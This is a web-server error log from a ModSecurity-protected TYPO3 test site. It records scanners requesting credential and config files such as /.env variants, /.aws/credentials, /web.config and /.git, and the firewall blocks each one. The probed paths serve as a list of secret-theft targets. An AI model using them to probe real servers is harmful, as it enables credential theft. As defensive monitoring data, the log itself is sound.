[Sun May 11 04:16:59.389658 2025] [authz_core:error] [pid 3076459] [client 154.83.103.202:14678] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sun May 11 04:16:59.412438 2025] [authz_core:error] [pid 3076459] [client 154.83.103.202:14678] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Sun May 11 04:16:59.536610 2025] [authz_core:error] [pid 3076459] [client 154.83.103.202:14678] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun May 11 04:16:59.562279 2025] [:error] [pid 3076459] [client 154.83.103.202:14678] [client 154.83.103.202] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aCAIm5w3RRRjd_Q1Vt_d9AAAAAA"]
[Sun May 11 04:16:59.562458 2025] [:error] [pid 3076459] [client 154.83.103.202:14678] [client 154.83.103.202] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aCAIm5w3RRRjd_Q1Vt_d9AAAAAA"]
[Sun May 11 04:16:59.562711 2025] [:error] [pid 3076459] [client 154.83.103.202:14678] [client 154.83.103.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aCAIm5w3RRRjd_Q1Vt_d9AAAAAA"]
[Sun May 11 04:16:59.562895 2025] [:error] [pid 3076459] [client 154.83.103.202:14678] [client 154.83.103.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aCAIm5w3RRRjd_Q1Vt_d9AAAAAA"]
[Sun May 11 04:16:59.593492 2025] [authz_core:error] [pid 3076459] [client 154.83.103.202:14678] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Sun May 11 12:36:02.452730 2025] [:error] [pid 3076459] [client 176.98.186.12:53179] [client 176.98.186.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCB9kpw3RRRjd_Q1Vt_eNAAAAAA"]
[Sun May 11 12:36:02.452995 2025] [:error] [pid 3076459] [client 176.98.186.12:53179] [client 176.98.186.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCB9kpw3RRRjd_Q1Vt_eNAAAAAA"]
[Sun May 11 12:36:02.453175 2025] [:error] [pid 3076459] [client 176.98.186.12:53179] [client 176.98.186.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCB9kpw3RRRjd_Q1Vt_eNAAAAAA"]
[Sun May 11 12:36:03.765742 2025] [:error] [pid 3076462] [client 176.98.186.12:53220] [client 176.98.186.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCB9k4HVl2qULKV2Q7OcpwAAAAM"]
[Sun May 11 12:36:03.766000 2025] [:error] [pid 3076462] [client 176.98.186.12:53220] [client 176.98.186.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCB9k4HVl2qULKV2Q7OcpwAAAAM"]
[Sun May 11 12:36:03.766184 2025] [:error] [pid 3076462] [client 176.98.186.12:53220] [client 176.98.186.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCB9k4HVl2qULKV2Q7OcpwAAAAM"]
[Sun May 11 12:36:08.539923 2025] [:error] [pid 3076463] [client 176.98.186.12:53979] [client 176.98.186.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aCB9mPYfJEmc7rpKGbevswAAAAQ"]
[Sun May 11 12:36:08.540176 2025] [:error] [pid 3076463] [client 176.98.186.12:53979] [client 176.98.186.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aCB9mPYfJEmc7rpKGbevswAAAAQ"]
[Sun May 11 12:36:08.540345 2025] [:error] [pid 3076463] [client 176.98.186.12:53979] [client 176.98.186.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aCB9mPYfJEmc7rpKGbevswAAAAQ"]
[Sun May 11 12:36:10.957052 2025] [:error] [pid 3076459] [client 176.98.186.12:51108] [client 176.98.186.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aCB9mpw3RRRjd_Q1Vt_eNQAAAAA"]
[Sun May 11 12:36:10.957302 2025] [:error] [pid 3076459] [client 176.98.186.12:51108] [client 176.98.186.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aCB9mpw3RRRjd_Q1Vt_eNQAAAAA"]
[Sun May 11 12:36:10.957462 2025] [:error] [pid 3076459] [client 176.98.186.12:51108] [client 176.98.186.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aCB9mpw3RRRjd_Q1Vt_eNQAAAAA"]
[Sun May 11 12:36:13.436117 2025] [:error] [pid 3076463] [client 176.98.186.12:52208] [client 176.98.186.12] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCB9nfYfJEmc7rpKGbevtAAAAAQ"]
[Sun May 11 12:36:13.436431 2025] [:error] [pid 3076463] [client 176.98.186.12:52208] [client 176.98.186.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCB9nfYfJEmc7rpKGbevtAAAAAQ"]
[Sun May 11 12:36:13.436630 2025] [:error] [pid 3076463] [client 176.98.186.12:52208] [client 176.98.186.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCB9nfYfJEmc7rpKGbevtAAAAAQ"]
[Sun May 11 12:36:38.034824 2025] [:error] [pid 3076463] [client 176.98.186.12:56988] [client 176.98.186.12] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aCB9tvYfJEmc7rpKGbevtgAAAAQ"]
[Sun May 11 12:36:38.035076 2025] [:error] [pid 3076463] [client 176.98.186.12:56988] [client 176.98.186.12] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aCB9tvYfJEmc7rpKGbevtgAAAAQ"]
[Sun May 11 12:36:38.035238 2025] [:error] [pid 3076463] [client 176.98.186.12:56988] [client 176.98.186.12] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aCB9tvYfJEmc7rpKGbevtgAAAAQ"]
[Tue May 13 17:36:37.463341 2025] [authz_core:error] [pid 3118203] [client 196.65.255.115:36977] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue May 13 22:09:19.648563 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCOm70ek2plj21rmDsm9sAAAABA"]
[Tue May 13 22:09:19.648846 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCOm70ek2plj21rmDsm9sAAAABA"]
[Tue May 13 22:09:19.649060 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCOm70ek2plj21rmDsm9sAAAABA"]
[Tue May 13 22:09:19.778636 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCOm70ek2plj21rmDsm9sQAAABA"]
[Tue May 13 22:09:19.778917 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCOm70ek2plj21rmDsm9sQAAABA"]
[Tue May 13 22:09:19.779115 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCOm70ek2plj21rmDsm9sQAAABA"]
[Tue May 13 22:09:19.890957 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aCOm70ek2plj21rmDsm9sgAAABA"]
[Tue May 13 22:09:19.891239 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aCOm70ek2plj21rmDsm9sgAAABA"]
[Tue May 13 22:09:19.891493 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aCOm70ek2plj21rmDsm9sgAAABA"]
[Tue May 13 22:09:19.921071 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCOm70ek2plj21rmDsm9swAAABA"]
[Tue May 13 22:09:19.921497 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCOm70ek2plj21rmDsm9swAAABA"]
[Tue May 13 22:09:19.921705 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCOm70ek2plj21rmDsm9swAAABA"]
[Tue May 13 22:09:19.951947 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aCOm70ek2plj21rmDsm9tAAAABA"]
[Tue May 13 22:09:19.952245 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aCOm70ek2plj21rmDsm9tAAAABA"]
[Tue May 13 22:09:19.952461 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aCOm70ek2plj21rmDsm9tAAAABA"]
[Tue May 13 22:09:23.059550 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Tue May 13 22:09:23.088997 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue May 13 22:09:23.257989 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db.ini
[Tue May 13 22:09:23.345772 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aCOm80ek2plj21rmDsm9vAAAABA"]
